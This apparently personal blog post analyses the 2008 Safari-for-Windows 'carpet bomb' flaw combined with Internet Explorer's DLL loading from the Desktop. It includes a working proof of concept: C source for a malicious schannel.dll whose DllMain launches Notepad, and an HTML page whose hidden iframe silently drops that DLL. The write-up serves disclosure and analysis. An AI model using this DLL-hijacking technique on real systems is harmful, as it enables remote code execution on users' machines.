Summary of What HappenedNitesh Dhanjani discovered
that Safari for Windows puts downloads automatically to Desktop and argued this can potentially make a mess of Desktop, naming it the effect of "Safari Carpet Bomb". Later Microsoft issued an
advisory stating "remote code execution on all supported versions of Windows XP and Windows Vista" and "Aviv Raff for working with us and reporting the blended threat of Safari and Microsoft Internet Explorer". Aviv Raff
posted on his blog "Safari pwns Internet Explorer", clarifying "this combined attack also exploits an old vulnerability in Internet Explorer that I've already reported to them a long long time ago".
Technical Details of This IncidentThe old vulnerability that Aviv Raff reported to Microsoft long time ago is described in two articles by Aviv Raff:
IE7 DLL-load hijacking Code Execution Exploit PoC, and
Internet Explorer 7 - Still Spyware Writers Heaven, both dating back to 2006(yeah that's really "a long long time ago"). This vulnerability lies in Windows Internet Explorer loading program library files(DLL) from user's Desktop instead of its own library file folder(usually C:\WINDOWS\SYSTEM32), when filenames are set to some specific values.
Safari for Windows downloads files to Desktop by default with no confirmation - which is a quite reasonable and convenient feature. And Windows Internet Explorer loads program library(DLL) from Desktop if the filename is set to some specific value. Two things added up, or "blended", IE loads library file downloaded by Safari. The action of loading library runs code in the library file, and loading the wrong file results in executing the wrong code.
Proof of Concept Code----------dll.c----------#include <windows.h>
BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi,sizeof(pi));
CreateProcess(NULL,"NOTEPAD \"=====(((((we are in)))))=====\"",NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}
Compile by cl /LD dll.c and rename the generated DLL file to "schannel.dll"
----------index.html----------<html><head>
<title>Safari for Windows Proof of Concept (Incident in June 2008)</title>
</head><body>
Safari for Windows Proof of Concept (Incident in June 2008)<br>
<br>
<a href="http://liudieyu0.blog124.fc2.com/blog-entry-1.html">Detailed Analysis Available on My Blog ...</a><br>
<br>
Step 1. Browse this web page with Safari for Windows, and download is copied to Desktop.
It's a legitimate feature.<br>
<iframe src="schannel.dll" width=1 height=1></iframe><br>
Step 2. Now launch Internet Explorer from Desktop or Start Menu, and code from the DLL file is executed.
<i>This is the issue.</i><br>
<br>
Note:<br>
Code in the DLL file launches NOTEPAD to open a file that doesn't exist.<br>
Please remove the downloaded DLL file on Desktop after testing.<br>
</body></html>
Live Demohttp://liudieyu.com/iesafari200806.2885391780966027/Final Words on ThisA design flaw in Windows Internet Explorer, version 8 beta, 7, and probably others, breaks the security of Safari for Windows shipped by Apple. The problem originated from an error that Windows Internet Explorer will load some program library files(DLL) from user's Desktop instead of its own library file folder(usually C:\WINDOWS\SYSTEM32). Apple's Safari for Windows downloads and saves requested file to user's Desktop by default - this default behavior itself does not constitute a mistake. Microsoft used some vague wording in
the advisory: "Suggested Actions" are "Restrict use of Safari as a web browser ...", as if it's a flaw rooted in Safari.
In sub-folder of "Suggested Actions" Microsoft admits "Workarounds" as "Change the download location of content in Safari to a newly created directory". The full statement should be "Change the download location of content in Safari to a newly created directory(to save the integrity of Windows Internet Explorer)".
PS:
I'm not an Apple fan, in fact I applied for their position of Safari for Windows Tester and they never replied. It's not so lame, cause they don't even get back to reporters when the whole world is accusing their product -
"An Apple spokesman did not return a phone call and e-mail seeking comment".
I believe in time all things come to light.